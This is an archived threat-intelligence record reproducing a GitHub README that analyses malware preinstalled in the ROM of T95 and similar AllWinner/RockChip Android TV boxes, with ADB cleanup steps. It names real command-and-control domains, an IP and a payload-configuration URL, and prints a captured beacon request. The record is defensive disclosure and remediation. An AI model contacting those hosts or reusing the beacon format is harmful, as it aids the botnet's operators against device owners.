{
	"id": "e727bfb1-0835-4d1f-8a19-d769abd430aa",
	"created_at": "2026-04-06T00:07:16.861224Z",
	"updated_at": "2026-04-10T03:20:02.172042Z",
	"deleted_at": null,
	"sha1_hash": "0dd0f461bfb60e4ddd6bf0c7cc5b71cba90df0cc",
	"title": "GitHub - DesktopECHO/T95-H616-Malware: \"Pre-Owned\" malware in ROM for AllWinner H616/H618 \u0026 RockChip RK3328 Android TV Boxes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 491333,
	"plain_text": "GitHub - DesktopECHO/T95-H616-Malware: \"Pre-Owned\"\r\nmalware in ROM for AllWinner H616/H618 \u0026 RockChip RK3328\r\nAndroid TV Boxes\r\nBy DesktopECHO\r\nArchived: 2026-04-05 20:41:49 UTC\r\nAllWinner H616/H618 \u0026 RockChip 3328 Android Malware Analysis · Cleanup\r\nDo you own an Android TV Box similar to one of these:\r\nT95 · AllWinner H616\r\nhttps://github.com/DesktopECHO/T95-H616-Malware\r\nPage 1 of 9\n\nT95Max · AllWinner H618\r\nX12-Plus · RockChip 3328\r\nX88-Pro-10 · RockChip 3328\r\n...and have a folder named:\r\n/data/system/Corejava or a file named /data/system/shared_prefs/open_preference.xml\r\nYour device is infected with malware, constantly trying to find a C2 server to upload 'telemetry' and await\r\ncommands without your knowledge or permission. It's included with the device, straight from the merchant you\r\nordered it from.\r\n04-May-2023 · adc.flyermobi.com and 128.199.97.77 taken offline\r\nNot long after the Gigaset update, adc.flyermobi.com went offline. DNS records for that domain are gone, and\r\nthere is no response from 128.199.97.77.\r\n28-Apr-2023 · Stage 1 Classes.dex gives up its secrets\r\nStage 1 will go to http://adc.flyermobi.com/update/update.conf (was 128.199.97.77) and get the URL for Stage 2:\r\n {\"Id\":1,\"version\":\"2.802\",\"url\":\"http://adc.flyermobi.com/data/b2802.data\",\"package\":\"com.mozgame.fruitmania\",\r\nThe URL above is arbitrary and can/will change. Stage 2 payload was encrypted; decrypted version is archived as\r\nclasses.dex. This particular example is meant to generate ad-click revenue in the background, but the malware a\r\ndevice receives is at the whim of the people running this IP.\r\nFun fact: http://adc.flyermobi.com/update/update.conf is also a URL used by the Gigaset Smartphone supply chain\r\nattack of August 2021.\r\nThose responsible did a good job hiding their identity until now, but they left behind an expired SSL certificate\r\nfrom 2017 bound to port 443. 
It's a real certificate issued by Symantec: dsp.dotinapp.com. The https site appears\r\nto be a dev/test version of the malware being served on port 80. This certificate, likely forgotten for years, is a\r\nclear indication of those behind the malware:\r\nSome Dotinapp PR to learn about who they are and what they do. You can even find them on LinkedIn\r\nIt's worth pointing out that the PR announcement is from 2017, the SSL certificate is from 2017, the first C2\r\nserver (ycxrl.com) got registered in 2017, and the Amazon reviews go back to 2017 (the H616 was released in\r\n2020).\r\nGiven the large number of positive reviews online for these Android TV boxes, I wonder how many YouTubers\r\nwere sponsored by Dotinapp or other interested parties to review these devices?\r\n26-Apr-2023 · Email message from T95 seller?\r\nI received this email the day after their C2 servers got shut down. Apparently they were looking to clear up the\r\nconfusion with an offering of sponsorship dollars and some effusive praise!\r\n25-Apr-2023 · AllWinner H618 and RockChip RK3328 Android TV Devices are\r\n\"pre-owned\" too\r\nThanks to Tanner at LTT for letting me review his findings; it appears the scope of this issue is much bigger than\r\nexpected; many Android TV Boxes with the AllWinner H616, H618 and RockChip RK3328 feature the\r\n\"Corejava\" C2 Bootstrap.\r\n24-Apr-2023 · Akamai/Linode Terminate Command and Control Servers\r\nIn January I filled out Linode's irritating-to-use Abuse Form, only to get brushed off with a nonsensical response\r\nby email. They have stated this is the only method available to file abuse complaints. 
It took a few days of\r\nbitching on Reddit to get the attention of a human Linode representative who was eventually convinced to shut\r\ndown the remaining three C2 IPs. The owners of the C2 servers were watching this whole exchange and changed\r\ntheir DNS to 127.0.0.1 in order to partially conceal their activity, but it did not work. As of today, the four\r\nassociated DNS names resolve to non-routable IPs, and the servers they originally resolved to have gone dark.\r\nNote this is only a temporary reprieve as the botnet can return on new hosts at any point. We'll be watching.\r\nAdded some interesting tcpflow dumps to the repo, for example here's how the conversation starts up with the C2\r\nservers:\r\nPOST /terminal/client/apiInfo HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: text/xml\r\nchannel: T10901\r\nimei: xx:xx:xx:xx:xx:xx\r\nlaunchername: com.swe.dgbluancher\r\nmodel: MBOX\r\nsdk: 29\r\nbrand: google\r\nuuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx\r\nvcode: 1\r\nandroidId: xxxxxxxxxxxxxxxx\r\nmanufacturer: Google\r\nUser-Agent: Dalvik/2.1.0 (Linux; U; Android 10; MBOX Build/QP1A.191105.004)\r\nHost: cbphe.com\r\nAccept-Encoding: gzip\r\nContent-Length: 0\r\nAllWinner and RockChip should do a little KYC before selling their SoC and tooling to anyone off the street. If\r\nthey allow the Bad Guys to create these ROMs, will they release a tool that helps end-users install a clean Android\r\nor Linux image to these devices?\r\nA few months ago I purchased a T95 Android TV box; it came with Android 10 (with working Play store) and an\r\nAllwinner H616 processor. It's a small-ish black box with a blue swirly graphic on top and a digital clock on the\r\nfront. There's got to be thousands (or more!) of these boxes already in use globally.\r\nThere are tons of them available for purchase on Amazon and AliExpress. 
By the end of January 2023, Amazon's\r\nselection of these devices thinned out considerably, but a quick scan online shows they are back in large numbers.\r\nThis device's ROM turned out to be very very sketchy -- Android 10 is signed with test keys, and named\r\n\"Walleye\" after the Google Pixel 2. I noticed there was not much crapware to be found, on the surface anyway. If\r\ntest keys weren't enough of a bad omen, I found ADB wide open over Ethernet and WiFi - right out of the box.\r\nI purchased the device to run Pi-hole among other things, and that's how I discovered just how nastily this box is\r\nfestooned with malware. After running the Pi-hole install I set the box's DNS1 and DNS2 to 127.0.0.1 and got a\r\nhell of a surprise. The box was reaching out to many known, active malware addresses.\r\nAfter searching unsuccessfully for a clean ROM, I set out to remove the malware in a last-ditch effort to make the\r\nT95 useful. I found layers on top of layers of malware using tcpflow and nethogs to monitor traffic and traced\r\nit back to the offending process/APK which I then removed from the ROM.\r\nThe final bit of malware I could not track down injects the system_server process and looks to be deeply baked\r\ninto the ROM. It's pretty sophisticated malware, resembling CopyCat in the way it operates. It's not found by any\r\nof the AV products I tried -- if anyone can offer guidance on how to find these hooks into system_server let me\r\nknow.\r\nThe closest I came to neutralizing the malware was to use Pi-hole to change the DNS of the command and control\r\nserver, YCXRL.COM to 127.0.0.2. 
You can then monitor activity with netstat:\r\nnetstat -nputwc | grep 127.0.0.2\r\ntcp6 1 0 127.0.0.1:34282 127.0.0.2:80 CLOSE_WAIT 2262/system_server\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34280 TIME_WAIT -\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34282 FIN_WAIT2 -\r\ntcp6 1 0 127.0.0.1:34282 127.0.0.2:80 CLOSE_WAIT 2262/system_server\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34280 TIME_WAIT -\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34282 FIN_WAIT2 -\r\ntcp6 1 0 127.0.0.1:34282 127.0.0.2:80 CLOSE_WAIT 2262/system_server\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34280 TIME_WAIT -\r\ntcp 0 0 127.0.0.2:80 127.0.0.1:34282 FIN_WAIT2 -\r\ntcp6 1 0 127.0.0.1:34282 127.0.0.2:80 CLOSE_WAIT 2262/system_server\r\nI also had to create an iptables rule to redirect all DNS to the Pi-hole as the malware/virus/whatever will use\r\nexternal DNS if it can't resolve, and then tries with a nonstandard port.\r\nadb shell iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to 127.0.0.1:53\r\nadb shell iptables -t nat -A OUTPUT -p tcp --dport 53 -j DNAT --to 127.0.0.1:53\r\nadb shell iptables -t nat -A OUTPUT -p tcp --dport 5353 -j DNAT --to 127.0.0.1:53\r\nadb shell iptables -t nat -A OUTPUT -p udp --dport 5353 -j DNAT --to 127.0.0.1:53\r\nBy doing this, the C\u0026C server ends up hitting the Pi-hole webserver:\r\n1672673217|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673247|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673277|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673307|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673907|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673937|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673967|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n1672673997|ycxrl.com|POST /terminal/client/eventinfo HTTP/1.1|404|0\r\n\"Stage 0\" hooks system_server and attempts to pull down a payload from ycxrl.com
, ycxrldow.com,\r\ncbphe.com, or cbpheback.com\r\nCleanup Instructions\r\nReboot into recovery to reset the device or use the Reset option in the 'about' menu to \"Factory Reset\" the\r\nT95\r\nWhen the device comes back online, connect to adb via USB A-to-A cable or WiFi/Ethernet\r\nRun the script (WiP!)\r\nCheck if the script was successful\r\nadb logcat | grep Corejava\r\nThe script prevents a successful download from the C2 servers, as the malware can't write to /Corejava, preventing\r\nthe payload from doing naughty things on your device:\r\n01-10 23:34:39.759 2153 2153 W FileUtils: Failed to chmod(/data/system/Corejava):\r\nandroid.system.ErrnoException: chmod failed: EPERM (Operation not permitted)\r\n01-10 23:34:39.760 2153 2153 W FileUtils: Failed to chmod(/data/system/Corejava/node):\r\nandroid.system.ErrnoException: chmod failed: ENOTDIR (Not a directory)\r\nOngoing Investigation\r\nIn this repo you will find Classes.dex, the 'Stage 1' payload I managed to capture. The malware takes many\r\nmeasures to prevent from being discovered. You can install Pi-hole and tcpflow to monitor activity. Hopefully a\r\nmethod can be found to completely disable the malware. The remediation instructions below are as close as it\r\ngets (for now).\r\n15-Mar-2023 · News + Simplified cleanup steps:\r\nThe botnet owners changed DNS on ycxrl.com to an invalid, private IP (192.168.9.1) ... so \"stage 0\" malware is\r\nrunning, but the pre-pwn3d malware is unable to download \"stage 1\" from ycxrl.com. They can change this back\r\nanytime they like to a real IP. 
Perform the following steps to prevent malware from showing up again when they\r\nchange ycxrl.com back to a real IP.\r\nInstall ADB (if not already installed):\r\nAssuming you're on Windows, to install ADB simply install Chocolatey first and install ADB using Choco:\r\nchoco install adb\r\nmacOS users have Homebrew to accomplish the same thing:\r\nbrew install android-platform-tools\r\nCleanup Steps:\r\nStart with a factory-reset device\r\nSet the root switch to enabled and restart the device\r\nGo to Settings -\u003e Network \u0026 Internet\r\nConnect to WiFi/Ethernet (preferably with a static IP and no gateway to prevent internet access)\r\nGet T95 IP address from WiFi/Ethernet settings, connect to the device and become root:\r\nadb connect [T95 IP address]\r\n  -\u003e * daemon not running; starting now at tcp:5037\r\n  -\u003e * daemon started successfully\r\n  -\u003e connected to 10.44.0.14:5555\r\nadb root\r\n  -\u003e restarting adbd as root\r\nStage 1's 'home' folder is /data/system/Corejava -- Defeat the malware by turning /data/system/Corejava into an\r\nimmutable file instead:\r\nadb shell rm -rf /data/system/Corejava\r\nadb shell touch /data/system/Corejava\r\nadb shell chmod 0000 /data/system/Corejava\r\nadb shell /vendor/bin/busybox chattr +i /data/system/Corejava\r\nAdditionally, the following prevents adups from running, which is an extra, unrelated layer of malware:\r\nadb shell pm uninstall --user 0 com.adups.fota\r\nadb shell pm uninstall --user 0 com.ftest\r\nadb shell pm uninstall --user 0 com.www.intallapp\r\nadb shell rm -rf /data/data/com.adups.fota\r\nadb shell touch /data/data/com.adups.fota\r\nadb shell chmod 0000 /data/data/com.adups.fota\r\nadb shell /vendor/bin/busybox chattr +i /data/data/com.adups.fota\r\nSource: https://github.com/DesktopECHO/T95-H616-Malware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/DesktopECHO/T95-H616-Malware"
	],
	"report_names": [
		"T95-H616-Malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434036,
	"ts_updated_at": 1775791202,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0dd0f461bfb60e4ddd6bf0c7cc5b71cba90df0cc.pdf",
		"text": "https://archive.orkl.eu/0dd0f461bfb60e4ddd6bf0c7cc5b71cba90df0cc.txt",
		"img": "https://archive.orkl.eu/0dd0f461bfb60e4ddd6bf0c7cc5b71cba90df0cc.jpg"
	}
}